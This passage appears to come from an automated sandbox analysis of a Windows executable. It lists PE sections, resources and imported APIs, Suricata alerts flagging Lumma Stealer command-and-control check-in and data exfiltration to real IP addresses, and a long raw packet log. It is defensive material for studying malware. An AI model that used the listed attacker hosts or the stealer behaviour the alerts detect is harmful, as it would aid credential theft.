.idata   0xb4000          0xf1c         0x1000    daddecfdccd86a491d85012d9e547c63  False     0.36474609375       data       4.791610915860562   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didata  0xb5000          0x1a4         0x200     be0581a07bd7d21a29f93f8752d3e826  False     0.345703125         data       2.7458225536678693  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata   0xb6000          0x9a          0x200     57cd71ca96fdc064696777e5b35cf0bb  False     0.2578125           data       1.881069204504408   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls     0xb7000          0x18          0x0       d41d8cd98f00b204e9800998ecf8427e  False     0                   empty      0.0                 IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata   0xb8000          0x5d          0x200     967e84eb6ac477621cd1643650d7bc91  False     0.189453125         data       1.3697437648744617  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc    0xb9000          0x4600        0x4600    e44948ca7f32719d0bee1a8f4e2ac964  False     0.322265625         data       4.440918715056619   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name           RVA      Size   Type                                                             Language  Country        ZLIB Complexity
RT_ICON        0xb94c8  0x128  Device independent bitmap graphic, 16 x 32 x 4, image size 192   Dutch     Netherlands    0.5675675675675675
RT_ICON        0xb95f0  0x568  Device independent bitmap graphic, 16 x 32 x 8, image size 320   Dutch     Netherlands    0.4486994219653179
RT_ICON        0xb9b58  0x2e8  Device independent bitmap graphic, 32 x 64 x 4, image size 640   Dutch     Netherlands    0.4637096774193548
RT_ICON        0xb9e40  0x8a8  Device independent bitmap graphic, 32 x 64 x 8, image size 1152  Dutch     Netherlands    0.3935018050541516
RT_STRING      0xba6e8  0x360  data                                                                                      0.34375
RT_STRING      0xbaa48  0x260  data                                                                                      0.3256578947368421
RT_STRING      0xbaca8  0x45c  data                                                                                      0.4068100358422939
RT_STRING      0xbb104  0x40c  data                                                                                      0.3754826254826255
RT_STRING      0xbb510  0x2d4  data                                                                                      0.39226519337016574
RT_STRING      0xbb7e4  0xb8   data                                                                                      0.6467391304347826
RT_STRING      0xbb89c  0x9c   data                                                                                      0.6410256410256411
RT_STRING      0xbb938  0x374  data                                                                                      0.4230769230769231
RT_STRING      0xbbcac  0x398  data                                                                                      0.3358695652173913
RT_STRING      0xbc044  0x368  data                                                                                      0.3795871559633027
RT_STRING      0xbc3ac  0x2a4  data                                                                                      0.4275147928994083
RT_RCDATA      0xbc650  0x10   data                                                                                      1.5
RT_RCDATA      0xbc660  0x2c4  data                                                                                      0.6384180790960452
RT_RCDATA      0xbc924  0x2c   data                                                                                      1.2045454545454546
RT_GROUP_ICON  0xbc950  0x3e   data                                                             English   United States  0.8387096774193549
RT_VERSION     0xbc990  0x584  data                                                             English   United States  0.278328611898017
RT_MANIFEST    0xbcf14  0x62c  XML 1.0 document, ASCII text, with CRLF line terminators         English   United States  0.4240506329113924
DLL: Imports
kernel32.dll: GetACP, GetExitCodeProcess, LocalFree, CloseHandle, SizeofResource, VirtualProtect, VirtualFree, GetFullPathNameW, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVersion, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetSystemInfo, GetCommandLineW, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
comctl32.dll: InitCommonControls
version.dll: GetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
user32.dll: CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
oleaut32.dll: SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
netapi32.dll: NetWkstaGetInfo, NetApiBufferFree
advapi32.dll: RegQueryValueExW, AdjustTokenPrivileges, LookupPrivilegeValueW, RegCloseKey, OpenProcessToken, RegOpenKeyExW
Name | Ordinal | Address
TMethodImplementationIntercept | 3 | 0x453abc
__dbk_fcall_wrapper | 2 | 0x40d3dc
dbkFCallWrapperAddr | 1 | 0x4b063c
Language of compilation system | Country where language is spoken | Map
Dutch | Netherlands |
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-28T15:50:07.155702+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49743 | 104.21.83.166 | 443 | TCP
2024-10-28T15:50:07.155702+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49743 | 104.21.83.166 | 443 | TCP
2024-10-28T15:50:08.587832+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49744 | 104.21.83.166 | 443 | TCP
2024-10-28T15:50:08.587832+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49744 | 104.21.83.166 | 443 | TCP
2024-10-28T15:50:15.323831+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49748 | 104.21.83.166 | 443 | TCP
2024-10-28T15:50:19.440889+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49750 | 104.21.83.166 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                            Oct 28, 2024 15:49:49.923580885 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.923913956 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.924031973 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.924489975 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.924597025 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.924902916 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.925028086 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.925549030 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.925674915 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.926143885 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.926239967 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.926681995 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.926724911 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.926769018 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.926769018 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.926784992 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.926848888 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.927381039 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.927449942 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.927519083 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.927570105 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.928257942 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.928384066 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.928797007 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.928854942 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.929552078 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.929611921 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.929625034 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.929637909 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.929661036 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.929661036 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.929694891 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.930432081 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.930480957 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.930526972 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.930526972 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.930533886 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.930912971 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.931288004 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.931363106 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.931684971 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.931811094 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.932212114 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.932276011 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.932693005 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.932784081 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.991146088 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.991246939 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.991488934 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.991564035 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.019501925 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.019630909 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.047589064 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.047708035 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.048193932 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.048326015 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.048649073 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.048796892 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.049061060 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.049123049 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.049312115 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.049362898 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.049396992 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.049876928 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.049958944 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.050344944 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.050419092 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.050652027 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.050760984 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.051227093 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.051281929 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.051918983 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.051990986 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.052346945 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.052406073 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.052447081 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.052452087 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.052500963 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.052628994 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.053430080 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.053520918 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.053884029 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.053968906 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.054452896 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.054529905 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.054908037 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.054987907 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.055238962 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.055300951 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.055519104 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.055593967 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.055828094 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.055895090 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.056341887 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.056406021 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.056761026 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.056869984 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.057225943 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.057287931 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.057352066 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.057352066 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.057358980 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.057403088 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.057779074 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.057842016 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.057852983 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.057960033 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.058653116 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.058693886 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.058721066 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.058726072 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.058741093 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.058880091 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.059205055 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.059263945 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.059495926 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.059616089 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.060188055 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.060235023 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.060257912 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.060262918 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.060302973 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.060302973 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.060888052 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.060955048 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.060993910 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.061000109 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.061036110 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.061036110 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.061675072 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.061762094 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.061799049 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.061810017 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.194190025 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.194200993 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.194221973 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.194278002 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.194278002 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.194680929 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.194791079 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.194792986 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.194817066 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.194874048 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.194875002 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.194910049 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.194984913 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.195264101 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.195334911 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.195420980 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.195491076 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.195532084 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.195610046 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.195626020 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.195694923 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.196222067 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.196280003 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.196326017 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.196417093 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.196424007 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.196448088 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.196491957 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.196491957 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.197119951 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.197180986 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.197237968 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.197312117 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.197350979 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.197427034 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.197454929 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.197523117 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.197549105 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.197613001 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.198102951 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.198178053 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.198245049 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.198324919 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.198345900 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.198391914 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.198896885 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.198983908 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.199012995 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.199073076 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.199124098 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.199234009 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.199235916 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.199259043 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.199292898 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.199309111 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.199364901 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.199421883 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.199712992 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.199793100 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.199824095 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.199889898 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.199911118 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.200037003 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.200432062 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.200515985 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.200546026 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.200656891 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.200681925 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.200691938 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.200732946 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.200732946 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.200752974 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.200818062 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.201244116 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.201325893 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.201404095 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.201493025 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.201500893 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.201524019 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.201566935 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.201631069 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.201963902 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.202022076 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.202090025 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.202171087 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.202222109 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.202285051 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.202333927 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.202434063 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.202480078 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.202487946 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.202517986 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.202630043 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.203165054 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.203231096 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.203277111 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.203341007 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.203372955 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.203469992 CET49736443192.168.2.4135.181.116.240
